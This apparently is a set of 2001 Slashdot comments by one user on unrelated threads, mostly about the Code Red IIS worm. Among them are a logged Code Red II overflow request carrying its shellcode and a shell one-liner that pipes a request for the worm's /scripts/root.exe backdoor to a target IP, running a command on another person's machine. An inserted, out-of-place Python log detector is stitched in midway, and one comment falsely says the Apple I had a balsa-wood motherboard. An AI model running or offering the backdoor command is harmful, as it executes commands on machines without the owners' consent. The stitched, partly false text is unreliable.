I saw that Reuters story earlier on Code Red III, but I have not seen any instances of attempted infection.
It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.
I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.
Then there is a nice little Vulnerable Server Scanner provided by the people at www.eeye.com.
It basically looks for vulnerable servers so that network admins can track them down and get the web admins to patch the machines before they get infected.
Nice to see someone has come up with a clean, pro-active method to kill this little menace off.
Never heard of this company.
Data Carrier companies are a pretty boring topic...
Not much money in pushing packets around...
uh huh... I hear ya knocking, but ya can't come in... Apache... ya ya ya.
I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.
You can find the results and a link to the script here
That's really nice!
Here are my logs: here.
Only 34 so far, but I only decided to open up apache to these this afternoon...
Cheers for that!
Very nice advice:
Here is a one-liner:
Usage: popup
#!/bin/sh
echo "GET /scripts/root.exe?+/c+start+http://www.digitalisland.com/codered/ HTTP/1.0" | telnet $1 80
Now how do I get it to tail my apache log and automatically run?
root@gate:~# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 14:43:22 GMT
Content-Length: 215
Content-Type: text/html
Error in CGI Application
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Connection closed by foreign host.
absolutely - use Multicast Groups as well.
I felt I was missing the fun... so I decided to open up a port on my firewall and check for some attack attempts...
It took only ten minutes before /var/log/apache/access_log came up with:
213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281
Blimey... 10 minutes! This thing is rife!!!
And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).
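Several posts above record Code Red hits from an Apache access_log and one asks how to tail the log and act on it automatically. The script below is an added example, not the Perl script or the one-liner posted in the thread. It parses Apache common-format log lines, classifies each request by the worm signature quoted above (the /default.ida overflow request, padded with N for Code Red v1/v2 and with X for Code Red II, plus requests for the /scripts/root.exe copy of cmd.exe that Code Red II leaves behind), and counts hits per source address so the owner of an infected host can be notified. The log lines, IP addresses (from the 192.0.2.0/24 and 198.51.100.0/24 documentation ranges) and the padding length are constructed for the example; a 404 from Apache means the probe did nothing here, but the source is still an infected machine worth reporting.

```python
"""Classify Code Red probes in Apache access_log lines and summarise by source.

Added example (not the thread's Perl script or one-liner). The padding length
and all log lines below are constructed; the hex payload mirrors the request
quoted in the thread.
"""
import re
import time
from collections import Counter

# Apache common/combined format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# The overflow request is GET /default.ida?<padding>%u9090...
# Code Red v1/v2 pad with 'N'; Code Red II pads with 'X'.
DEFAULT_IDA_RE = re.compile(r'^GET /default\.ida\?(?P<pad>[NX]+)%u')

# Code Red II copies cmd.exe to /scripts/root.exe and /MSADC/root.exe; a
# request for either is someone looking for that backdoor.
ROOT_EXE_RE = re.compile(r'^GET /(scripts|MSADC)/root\.exe', re.IGNORECASE)


def classify(request):
    """Label one request string, or return None if it is not Code Red related."""
    m = DEFAULT_IDA_RE.match(request)
    if m:
        return {"N": "CodeRed-v1/v2", "X": "CodeRed-II"}[m.group("pad")[0]]
    if ROOT_EXE_RE.match(request):
        return "root.exe-backdoor-probe"
    return None


def parse_line(line):
    """Return (ip, time, label, status) for a Code Red related line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    label = classify(m.group("req"))
    if label is None:
        return None
    return (m.group("ip"), m.group("time"), label, int(m.group("status")))


def summarise(lines):
    """Count hits per (source ip, label) over an iterable of log lines."""
    counts = Counter()
    for line in lines:
        hit = parse_line(line)
        if hit:
            counts[(hit[0], hit[2])] += 1
    return counts


def follow(path, poll=1.0):
    """Yield lines appended to `path`, like `tail -f`, for live monitoring."""
    with open(path) as f:
        f.seek(0, 2)  # start at end of file; only new lines are reported
        while True:
            line = f.readline()
            if line:
                yield line
            else:
                time.sleep(poll)


# Constructed sample log; the padding length is arbitrary for the example.
PAYLOAD = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3"
           "%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Aug/2001:14:12:16 +0100] "GET /default.ida?' + "X" * 224 + PAYLOAD + ' HTTP/1.0" 404 281',
    '192.0.2.10 - - [05/Aug/2001:14:31:02 +0100] "GET /default.ida?' + "X" * 224 + PAYLOAD + ' HTTP/1.0" 404 281',
    '192.0.2.20 - - [05/Aug/2001:14:40:55 +0100] "GET /default.ida?' + "N" * 224 + PAYLOAD + ' HTTP/1.0" 404 281',
    '192.0.2.30 - - [05/Aug/2001:15:01:09 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 275',
    '198.51.100.7 - - [05/Aug/2001:15:02:00 +0100] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    for (ip, label), n in sorted(summarise(SAMPLE_LOG).items()):
        print(f"{ip:16} {label:24} {n} hit(s)")
    # For a live log: for line in follow("/var/log/apache/access_log"): ...
```

Run against a real log with `summarise(open("/var/log/apache/access_log"))`; swap in `follow(...)` to watch the file as new probes arrive. Only source addresses in the 404s are useful here: the N/X distinction tells you which variant the remote host is running, and a root.exe request is a sign that something is already looking for compromised IIS hosts in your range.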
I live in the UK, and I have to ask:
"What is a Datsun, sonny?"
Only a handful (yes, a handful) of Apple I's were ever made.
All of them had a motherboard made out of balsa - (yes balsawood!).
$25,000 - that is a very low price, considering the rarity of the object.
It would take Steve Wozniak twenty five seconds to sign all the produced models of the Apple I, so the fact that it was signed is pretty much neither here nor there.
It certainly does depend.
Judging by how trivial you found Apache, Perl, MySQL & PHP setup I can presume that you are hardly a typical computer user.
Just a point to make about the O'reilly book that was mentioned to be out of print. It may be out of print but it isn't offline. And it's not PDF either :0
yep... mod this one down as soon as you can please.
Thank you for proving my point. :-)
Don't forget the Amiga - its user base actually killed the Amiga off...
Other than that - I really hear you...
The moderator who moderated this is a bit of an idiot.
- Just my opinion -
When employees start posting their CVs and Resumes (1, 2, 3) on company sites run by their employers then either the site has to go or the employees have to go... or both.
yeah right - "because our Win2k IIS server seemed to get DDos even after we posted our recommendations on securing Win2k against it we are migrating to Linux... we expect to have completed this the week after next"
I especially like the bollocks they use:
Colour it Green - call it red...
and so on...
This is bollocks! At its best.
Hear Hear! Just drop the routes to unnecessary hosts - now those are real security measures - and they work!
Until someone compromises one of those trusted systems...
Necessary data connections between the networks are randomly disconnected by a mechanical device. Even developers working in the bank have limited internet access by a slow modem to a secure proxy server (which might make it a crappy job but also a fine place to put your money in).
Randomly? Do they randomly deposit money in their customer accounts as well?
oh come on! I have never heard such clap trap - Do you have a URL, rather than these weird urban legend approaches to network security?
slow modem? They use modems? Banks? I just can't believe it. I've seen the network installations of many financial institutions and there were very few modems - plenty of switches, firewalls and routers though.
We have only a limited number of hubs
Who's "we"?
I'd be surprised if they're using hubs at all. Switches are better, they could implement VLANs to separate their mission critical networks from their "office" networks.
Your description is really scary - I hope your power companies have better IT/Network Operations departments...
april 1st was 22 days ago matey.